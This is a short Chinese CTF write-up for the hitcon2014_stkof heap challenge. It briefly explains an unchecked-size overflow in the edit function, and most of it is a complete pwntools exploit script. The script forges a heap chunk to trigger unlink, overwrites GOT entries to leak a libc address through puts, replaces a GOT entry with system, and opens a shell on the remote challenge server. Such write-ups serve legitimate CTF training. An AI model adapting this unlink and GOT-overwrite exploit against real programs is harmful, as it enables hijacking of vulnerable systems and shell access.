hitcon2014_stkof
查看保护
在edit这个功能下可以输入size。没有对size进行判断,这里产生了溢出。
unlink即可。unlink控制堆指针为got表,接着就可以改got为puts,泄露出libc,改got为gadget或system。具体unlink知识看z1r0’s blog
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 29169)
else:
r = process(file_name)
elf = ELF(file_name)
libc = ELF('./2.23/libc-2.23.so')
def create(size):
r.sendline('1')
r.sendline(str(size))
def edit(index, size, content):
r.sendline('2')
r.sendline(str(index))
r.sendline(str(size))
r.send(content)
def delete(index):
r.sendline('3')
r.sendline(str(index))
def dbg():
gdb.attach(r)
create(0x100)
create(0x30)
create(0x80)
fd = p64(0x602140 - 0x8)
bk = p64(0x602140)
fake_chunk = p64(0) + p64(0x20) + fd + bk + p64(0x20)
fake_chunk = fake_chunk.ljust(0x30, b'a')
p1 = fake_chunk + p64(0x30) + p64(0x90)
edit(2, len(p1), p1)
delete(3)
free_got = elf.got['free']
puts_got = elf.got['puts']
atoi_got = elf.got['atoi']
puts_plt = elf.plt['puts']
p2 = p64(0) + p64(free_got) + p64(puts_got) + p64(atoi_got)
edit(2, len(p2), p2)
p3 = p64(puts_plt)
edit(0, len(p3), p3)
delete(1)
puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
success('puts_addr = ' + hex(puts_addr))
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
p4 = p64(system_addr)
edit(2, len(p4), p4)
r.sendline('/bin/sh\x00')
r.interactive()